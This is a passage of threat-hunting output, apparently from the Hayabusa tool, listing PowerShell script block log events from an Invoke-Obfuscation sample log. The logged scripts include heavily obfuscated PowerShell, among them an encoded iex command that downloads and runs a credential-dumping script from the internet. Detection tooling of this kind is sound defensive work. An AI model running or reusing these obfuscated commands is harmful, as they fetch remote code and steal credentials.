{$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.121 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:43.135 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 
46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:43.135 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:04.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:04.320 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.877 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} 
=++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} 
+${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} 
+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.877 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? 
""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + 
${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& 
${=}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.938 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 +[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ [CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + 
[CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.040 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.050 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.054 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.057 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.060 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.062 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.067 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.077 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.081 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.085 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.089 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.107 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.118 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.272 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.286 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.338 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.959 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.959 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.960 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.963 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:26.128 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ 
